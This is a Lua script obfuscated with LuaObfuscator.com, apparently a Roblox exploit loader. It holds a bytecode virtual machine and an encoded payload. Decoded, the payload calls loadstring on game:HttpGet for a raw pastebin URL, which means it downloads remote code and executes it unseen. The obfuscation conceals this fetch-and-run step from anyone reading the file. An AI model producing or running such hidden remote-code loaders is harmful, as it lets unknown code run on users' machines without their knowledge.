--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==1) then v21=function(v31,v32,v33)if v33 then local v71=0 -0 ;local v72;while true do if (v71==(0 -0)) then v72=(v31/((5 -(9 -6))^(v32-(1 + 0))))%((2 + 0)^(((v33-(680 -(123 + 556))) -(v32-(1 -0))) + (1 -0) + 0)) ;return v72-(v72%(1 -(0 + 0))) ;end end else local v73=(5 -3)^(v32-(1 + 0)) ;return (((v31%(v73 + v73))>=v73) and (1 + 0)) or (0 + 0) ;end end;v22=nil;v22=function()local v39=v1(v16,v19,v19);v19=v19 + 1 ;return v39;end;v23=nil;v18=2;end if (v18==4) then v28=nil;v28=function(...)return {...},v12("#",...);end;v29=nil;v29=function()local v40=0 -0 ;local v41;local v42;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v40~=(1242 -(71 + 1171))) then else v41=0 + 0 ;v42=nil;v40=837 -(179 + 657) ;end if (v40==(2 -1)) then v43=nil;v44=nil;v40=2;end if (v40~=3) then else v47=nil;v48=nil;v40=1 + 3 ;end if (v40==(475 -(69 + 402))) then while true do if ((0 -0)==v41) then local v87=210 -(74 + 136) ;while true do if (v87==(111 -(38 + 72))) then v41=154 -(94 + 59) ;break;end if (v87==(0 -0)) then v42=722 -(353 + 369) ;v43=nil;v87=1 -0 ;end end end if (v41~=3) then else v48=nil;while true do local v91=0 -0 ;local v92;while true do if (v91~=(0 + 0)) then else v92=0;while true do if (v92~=(0 + 0)) then else local v114=0 + 0 ;while true do if (v114~=(0 -0)) then else if (v42==(7 -5)) then local v122=0 + 0 ;local v123;while true do if ((0 -0)~=v122) then else v123=0 + 0 ;while true do if (v123==(4 -3)) then for v153=1 + 0 ,v24() do local v154=0 -0 ;local v155;local v156;local v157;local v158;while true do if (v154==1) then v157=nil;v158=nil;v154=1 + 1 ;end if (v154~=(0 + 0)) then else v155=1242 -(757 + 485) ;v156=nil;v154=1;end if (v154~=(2 + 0)) then else while true do if (v155~=(1 + 0)) then else v158=nil;while true do if (v156==(1 + 0)) then while true do if (v157~=(903 -(25 + 878))) then else v158=v22();if (v21(v158,1 + 0 ,1 -0 )~=(0 + 0)) then else local v196=1167 -(170 + 997) ;local v197;local v198;local v199;while true do if (v196==0) then v197=v21(v158,2 + 0 ,6 -3 );v198=v21(v158,1076 -(775 + 297) ,6);v196=60 -(29 + 30) ;end if (v196~=(1 -0)) then else local v202=1718 -(1026 + 692) ;while true do if (v202==(396 -(122 + 274))) then v199={v23(),v23(),nil,nil};if (v197==(583 -(307 + 276))) then local v210=0;local v211;local v212;while true do if (v210==(901 -(223 + 677))) then while true do if (v211==0) then v212=0 + 0 ;while true do if (v212==(169 -(74 + 95))) then v199[3]=v23();v199[4]=v23();break;end end break;end end break;end if (v210~=(0 + 0)) then else v211=0;v212=nil;v210=1;end end elseif (v197==(1 + 0)) then v199[3 -0 ]=v24();elseif (v197==(1787 -(748 + 1037))) then v199[3 + 0 ]=v24() -((2 + 0)^16) ;elseif (v197~=(430 -(127 + 300))) then else local v215=0;while true do if (v215~=(0 -0)) then else v199[3]=v24() -((2 + 0)^16) ;v199[4]=v23();break;end end end v202=1 + 0 ;end if (v202==(268 -(131 + 136))) then v196=2;break;end end end if ((6 -4)==v196) then if (v21(v198,1,3 -2 )==1) then v199[18 -(6 + 10) ]=v48[v199[5 -3 ]];end if (v21(v198,2,2)==(1827 -(756 + 1070))) then v199[1656 -(1523 + 130) ]=v48[v199[3]];end v196=3;end if ((1 + 2)==v196) then if (v21(v198,2 + 1 ,3 + 0 )~=1) then else v199[4]=v48[v199[1437 -(294 + 1139) ]];end v43[v153]=v199;break;end end end break;end end break;end if (v156~=(1926 -(1856 + 70))) then else local v183=1843 -(293 + 1550) ;while true do if ((1 -0)==v183) then v156=1;break;end if (v183~=(412 -(334 + 78))) then else v157=0;v158=nil;v183=2 -1 ;end end end end break;end if (v155~=(1122 -(527 + 595))) then else v156=0;v157=nil;v155=1 + 0 ;end end break;end end end v42=1701 -(1098 + 600) ;break;end if ((0 + 0)==v123) then for v159=1,v47 do local v160=0;local v161;local v162;local v163;local v164;while true do if (v160~=(2 + 0)) then else while true do if (v161==(0 -0)) then v162=0;v163=nil;v161=3 -2 ;end if (v161==(1 + 0)) then v164=nil;while true do if ((163 -(78 + 84))==v162) then if (v163==1) then v164=v22()~=0 ;elseif (v163==(5 -3)) then v164=v25();elseif (v163~=(1 + 2)) then else v164=v26();end v48[v159]=v164;break;end if (v162==(0 + 0)) then local v185=0;local v186;while true do if (v185~=(0 -0)) then else v186=0 -0 ;while true do if (v186==(1044 -(418 + 625))) then v162=1;break;end if (v186==(0 + 0)) then local v201=0 -0 ;while true do if (v201==(1966 -(146 + 1819))) then v186=1759 -(1347 + 411) ;break;end if ((1179 -(597 + 582))==v201) then v163=v22();v164=nil;v201=1;end end end end break;end end end end break;end end break;end if (v160==(1 + 0)) then v163=nil;v164=nil;v160=2 + 0 ;end if (v160==0) then v161=0 + 0 ;v162=nil;v160=2 -1 ;end end end v46[908 -(723 + 182) ]=v22();v123=1048 -(694 + 353) ;end end break;end end end if (3~=v42) then else local v124=0 -0 ;local v125;while true do if (v124~=(1724 -(1122 + 602))) then else v125=0 -0 ;while true do local v148=0 -0 ;while true do if (v148==(284 -(229 + 55))) then if (v125==(1 + 0)) then return v46;end if (v125~=(0 -0)) then else local v165=0;while true do if ((1 + 0)~=v165) then else v125=1;break;end if (v165==(289 -(123 + 166))) then local v172=0 + 0 ;while true do if (v172==0) then for v187=1894 -(1266 + 627) ,v24() do v44[v187-(17 -(5 + 11)) ]=v29();end for v189=1862 -(710 + 1151) ,v24() do v45[v189]=v24();end v172=127 -(83 + 43) ;end if (v172~=(1 + 0)) then else v165=2 -1 ;break;end end end end end break;end end end break;end end end v114=1568 -(1065 + 502) ;end if (v114==(2 -1)) then v92=289 -(242 + 46) ;break;end end end if (v92==(2 -1)) then if (v42==0) then local v115=0;local v116;local v117;while true do if ((0 + 0)~=v115) then else v116=0 -0 ;v117=nil;v115=808 -(641 + 166) ;end if (v115==(688 -(468 + 219))) then while true do if (v116~=0) then else v117=0 + 0 ;while true do if (v117~=(0 -0)) then else local v150=0 -0 ;local v151;while true do if (v150==(0 -0)) then v151=556 -(376 + 180) ;while true do if (v151==1) then v117=4 -3 ;break;end if (v151==(0 -0)) then v43={};v44={};v151=1;end end break;end end end if (v117~=(1 + 0)) then else v45={};v42=2 -1 ;break;end end break;end end break;end end end if (v42~=(2 -1)) then else local v118=1673 -(599 + 1074) ;local v119;local v120;while true do if (v118==0) then v119=0 + 0 ;v120=nil;v118=1 + 0 ;end if (v118~=1) then else while true do if (v119~=(1016 -(138 + 878))) then else v120=1538 -(1130 + 408) ;while true do if (v120==(1 + 0)) then v48={};v42=885 -(363 + 520) ;break;end if (v120==(1403 -(195 + 1208))) then v46={v43,v44,nil,v45};v47=v24();v120=1 -0 ;end end break;end end break;end end end break;end end break;end end end break;end if (v41==(599 -(383 + 215))) then local v88=1079 -(304 + 775) ;while true do if (v88~=0) then else v44=nil;v45=nil;v88=1;end if (v88==(1 + 0)) then v41=1 + 1 ;break;end end end if (2==v41) then local v89=0;local v90;while true do if (0==v89) then v90=0;while true do if (v90~=(646 -(9 + 636))) then else v41=475 -(430 + 42) ;break;end if (v90==(0 + 0)) then local v113=993 -(965 + 28) ;while true do if (v113==1) then v90=3 -2 ;break;end if (v113==0) then v46=nil;v47=nil;v113=572 -(448 + 123) ;end end end end break;end end end end break;end if ((3 -1)==v40) then v45=nil;v46=nil;v40=3;end end end;v18=5;end if (v18==3) then v25=function()local v49=0 -0 ;local v50;local v51;local v52;local v53;local v54;local v55;while true do if (v49==((1988 -(1346 + 642)) + 0)) then v50=v24();v51=v24();v49=1 -0 ;end if (v49==(1 + 0)) then v52=1 + 0 ;v53=(v21(v51,1003 -(357 + 217 + 428) ,7 + 13 ) * ((4 -2)^(135 -103))) + v50 ;v49=569 -(358 + 209) ;end if (v49==(1936 -(1752 + 182))) then v54=v21(v51,7 + 14 ,6 + 25 );v55=((v21(v51,20 + 12 )==(2 -1)) and  -(1 + 0)) or (1 + 0) ;v49=1 + 2 ;end if (v49==((5 -2) + 0)) then if (v54==(0 -0)) then if (v53==(0 -0)) then return v55 * (0 + 0 + 0) ;else v54=1 + (0 -0) ;v52=0 -(992 -(134 + 858)) ;end elseif (v54==((1140 + 1755) -(756 + 92))) then return ((v53==((414 -(114 + 300)) + 0)) and (v55 * ((1 + 0)/(0 -0)))) or (v55 * NaN) ;end return v8(v55,v54-(2307 -(2228 -(70 + 874))) ) * (v52 + (v53/((9 -7)^(1402 -((333 -215) + (1992 -(137 + 623))))))) ;end end end;v26=nil;v26=function(v34)local v56;if  not v34 then local v74=0 -0 ;while true do if (0==v74) then v34=v24();if (v34==(0 + 0 + 0)) then return "";end break;end end end v56=v3(v16,v19,(v19 + v34) -1 );v19=v19 + v34 ;local v57={};for v69=1 + 0 , #v56 do v57[v69]=v2(v1(v3(v56,v69,v69)));end return v6(v57);end;v27=v24;v18=4;end if (v18==2) then v23=function()local v58=1359 -(702 + 657) ;local v59;local v60;while true do if (v58==(200 -(94 + 106))) then v59,v60=v1(v16,v19,v19 + 2 );v19=v19 + 1 + 1 ;v58=1 + 0 ;end if (v58==(1 + 0)) then return (v60 * (226 + 30)) + v59 ;end end end;v24=nil;v24=function()local v61,v62,v63,v64=v1(v16,v19,v19 + 3 );v19=v19 + 4 + 0 ;return (v64 * (2824267 + 5737341 + (8216231 -(599 + 24)))) + (v63 * (65825 -(274 + 15))) + (v62 * (56 + 200)) + v61 ;end;v25=nil;v18=3;end if (v18==5) then v30=nil;v30=function(v35,v36,v37)local v65=0;local v66;local v67;local v68;while true do if (v65==0) then v66=v35[1];v67=v35[2];v65=1;end if (1==v65) then v68=v35[3];return function(...)local v81=0;local v82;local v83;local v84;local v85;local v86;while true do if (v81==0) then v82=1;v83= -1;v81=1;end if (3==v81) then A,B=v28(v11(v86));if  not A[1] then local v105=v35[4][v82] or "?" ;error("Script error at ["   .. v105   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (v81==1) then v84={...};v85=v12("#",...) -1 ;v81=2;end if (v81==2) then v86=nil;v86=function()local v95=v66;local v96=v67;local v97=v68;local v98=v28;local v99={};local v100={};local v101={};for v106=0 -0 ,v85 do if ((v106>=v97) or ((2456 -(38 + 55))<(1933 -(183 + 399)))) then v99[v106-v97 ]=v84[v106 + (4 -3) ];else v101[v106]=v84[v106 + 1 + 0 ];end end local v102=(v85-v97) + (368 -(304 + (93 -30))) ;local v103;local v104;while true do local v107=0 + 0 ;local v108;while true do if (((0 -0)==v107) or (2933>=(478 + 4040))) then v108=0;while true do if (((8643 -6468)<(4667 -(1102 + 96))) and (v108==(783 -(517 + 266)))) then local v121=0 + 0 ;while true do if ((v121==(0 + 0)) or ((3163 -(1123 + 656))==(889 -668))) then local v126=0 + 0 ;while true do if ((v126==((1239 -776) -((516 -183) + (351 -221)))) or ((3794 -(505 + 817))<=((1383 -(346 + 77)) -(1577 -(228 + 1045))))) then v103=v95[v82];v104=v103[2 -1 ];v126=399 -(90 + 308) ;end if ((((4217 -(683 + 334)) -(522 + (1313 -653)))<=3817) and (v126==(1 + 0))) then v121=(1049 -(498 + 550)) -0 ;break;end end end if ((v121==1) or ((316 + 1467)>=(4214 -(1457 + 42)))) then v108=1;break;end end end if ((v108==(1 + 0)) or ((2644 -(253 + 300))>(4433 -(21 + 30)))) then if ((v104<=(2 -(0 + 0))) or (3930<=(4846 -(254 + 1115)))) then if (((2090 -(189 + 63))<(3059 -(190 + 131))) and (v104<=(0 -0))) then v101[v103[2 + 0 ]]=v103[3 + (1224 -(284 + 940)) ];elseif (((2693 -1217)<3947) and (v104>(2 -1))) then v101[v103[2 -0 ]]();else do return;end end elseif (((6820 -5371)>(20 + 317)) and (v104<=(2 + 2))) then if ((v104==(32 -(7 + 22))) or ((9383 -6106)>=4903)) then v101[v103[1 + 1 ]]=v37[v103[1387 -(369 + 1015) ]];else local v133=0;local v134;local v135;local v136;while true do if (((1745 -(717 + 144))>(1826 -(457 + 766))) and (v133==1)) then v136=nil;while true do if (((1229 -(724 + 504))==v134) or ((5380 -((2980 -2308) + 143 + 9))<(11034 -7615))) then v101[v135 + (1 -0) ]=v136;v101[v135]=v136[v103[(151 -61) -(40 + 46) ]];break;end if (((3008 -(90 + (2811 -1813)))>(3526 -(3333 -1164))) and (v134==0)) then local v169=0 -0 ;local v170;while true do if ((v169==((2795 -(1280 + 253)) -(510 + 752))) or ((2356 + 515)>(4947 -(169 + 174)))) then v170=0 + 0 ;while true do if (((1 + 0)==v170) or ((19318 -15111)<=(5230 -(142 + 1536)))) then v134=(3 -2) -0 ;break;end if ((v170==(0 + 0)) or ((1817 -(316 + 216))>4816)) then local v182=(0 -0) -0 ;while true do if ((v182==(622 -(198 + 424))) or (2141>(1640 + 1211))) then v135=v103[(3 + 0) -1 ];v136=v101[v103[194 -(16 + 175) ]];v182=1 + (1371 -(1368 + 3)) ;end if (((2208 -1722)==(48 + 438)) and (v182==1)) then v170=1;break;end end end end break;end end end end break;end if ((v133==0) or ((4981 -(334 + 453))==4228)) then local v152=0 + (159 -(51 + 108)) ;while true do if (((41 + (351 -151))<(88 + 287)) and (v152==(0 -0))) then v134=0;v135=nil;v152=1 + 0 ;end if (((18010 -(7553 + 5486))>=(505 + (1558 -(509 + 907)))) and (v152==(1 + 0 + 0))) then v133=4 -3 ;break;end end end end end elseif ((((505 -292) + 1470)<2448) and (v104>(9 -4))) then local v137=372 -(197 + 175) ;local v138;local v139;local v140;local v141;local v142;local v143;while true do if ((v137==((0 -0) + 0 + 0)) or (((2607 -(655 + 208)) -((4047 -2844) + 215))>=((1035 + 2798) -(1290 + 323)))) then v138=0 -0 ;v139=nil;v137=1337 -(1199 + 137) ;end if ((v137==((1145 -(700 + 442)) + 0)) or (1909==(2650 -(97 + 430 + 151)))) then while true do if (((8411 -6286)>=(3064 -1020)) and (v138==(2 + 0))) then v143=nil;while true do if ((v139==(3 -2)) or ((5413 -(915 + 699))<=(1057 + 2405))) then local v173=0;local v174;while true do if ((v173==0) or (((4975 -(345 + 6)) + (1846 -(94 + 1744)))<=(10806 -6771))) then v174=1815 -(1243 + (1361 -789)) ;while true do if ((((7861 -(1359 + 250)) -(121 + 1215))>(719 + 819)) and (v174==(1 -0))) then v139=7 -5 ;break;end if ((v174==(0 + 0)) or ((5490 -1280)<((3759 -(902 + 770)) -((1063 -820) + 449)))) then v83=(v142 + v140) -1 ;v143=0 -(0 -0) ;v174=1;end end break;end end end if ((v139==0) or ((5637 -(869 + 66 + 37))<=(2579 -(1393 + 137)))) then local v175=0 -0 ;local v176;while true do if (((631 + 542)==(281 + (2244 -1352))) and (v175==(779 -(763 + 16)))) then v176=0 -(0 -0) ;while true do if (((17379 -12458)>(1015 + 223)) and (v176==(1175 -(81 + 1093)))) then v139=1;break;end if (((454 + 1713 + 978)>1009) and (v176==(0 -0))) then local v193=0;while true do if (((3380 -(33 + 80))==(1496 + 335 + 1436)) and (v193==(0 -0))) then v140=v103[596 -(406 + 188) ];v141,v142=v98(v101[v140](v13(v101,v140 + 1 ,v103[3 -0 ])));v193=1918 -(753 + 1077 + (264 -177)) ;end if ((3850>((1004 + 139) -(745 + (1787 -(94 + 1542))))) and (v193==(1 + 0))) then v176=109 -(90 + 18) ;break;end end end end break;end end end if (((3363 -1427)>=(507 + (498 -386))) and (v139==2)) then for v179=v140,v83 do local v180=(0 -0) -0 ;local v181;while true do if (((1702 -(912 + 790))==v180) or ((616 + 0)>=(5000 -(37 + 1004)))) then v181=0;while true do if ((v181==0) or ((3385 + 882)<74)) then v143=v143 + (139 -((53 -37) + 122)) ;v101[v179]=v141[v143];break;end end break;end end end break;end end break;end if ((v138==((3 -0) -2)) or ((962 + 301)>(6866 -(7803 -4099)))) then v141=nil;v142=nil;v138=3 -1 ;end if ((v138==(0 + 0)) or ((1919 -(918 + 277))>(2682 -(57 + (1555 -(232 + 880)))))) then v139=0 -0 ;v140=nil;v138=3 -2 ;end end break;end if ((v137==(3 -1)) or ((3665 -2552)>=4905)) then v142=nil;v143=nil;v137=(2 -1) + 2 ;end if (((941 + 1328)<(4298 -1800)) and (v137==(1 -(209 -(16 + 193))))) then v140=nil;v141=nil;v137=5 -3 ;end end else local v144=(0 -0) -0 ;local v145;local v146;local v147;while true do if ((1699>(1445 -(1350 + 5))) and (v144==(0 -0))) then v145=0;v146=nil;v144=1 -(751 -(28 + 723)) ;end if ((2629>(52 + 174)) and (v144==(2 -1))) then v147=nil;while true do if ((v145==(0 -(0 -0))) or ((1335 + (3589 -(175 + 599)))<((15717 -(1454 + 100)) -10238))) then local v171=85 -(12 + 73) ;while true do if (((173 + 61 + 1516)<(2089 + 214)) and (v171==((1227 -(32 + 1043)) -(95 + 57)))) then v146=(0 -0) + 0 ;v147=nil;v171=1 + (122 -(121 + 1)) ;end if ((v171==1) or ((482 + (3861 -(8 + 146)))<(4956 -3594))) then v145=(32 + 173) -(178 + 9 + 17) ;break;end end end if (((13157 -9055)==4102) and (v145==(1 + 0))) then while true do if ((v146==0) or ((591 + 1206)>=(5825 -(286 + 1406)))) then v147=v103[1 + 1 ];v101[v147]=v101[v147](v13(v101,v147 + 1 ,v83));break;end end break;end end break;end end end v82=v82 + 1 ;break;end end break;end end end end;v81=3;end end end;end end end;return v30(v29(),{},v17)(...);end if (0==v18) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38)if (v1(v38,2)==79) then local v75=0;while true do if (v75==0) then v20=v0(v3(v38,1,1));return "";end end else local v76=0;local v77;while true do if (v76==0) then v77=v2(v0(v38,16));if v20 then local v93=0;local v94;while true do if (1==v93) then return v94;end if (v93==0) then v94=v5(v77,v20);v20=nil;v93=1;end end else return v77;end break;end end end end);v21=nil;v18=1;end end end v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403213O00682O7470733A2O2F706173746562696E2E636F6D2F7261772F534D63645557396A00083O0012033O00013O001203000100023O00200400010001000300122O000300044O0006000100034O00055O00022O00023O000100012O00013O00017O00083O00023O00023O00023O00023O00023O00023O00023O00033O00",v9(),...);end
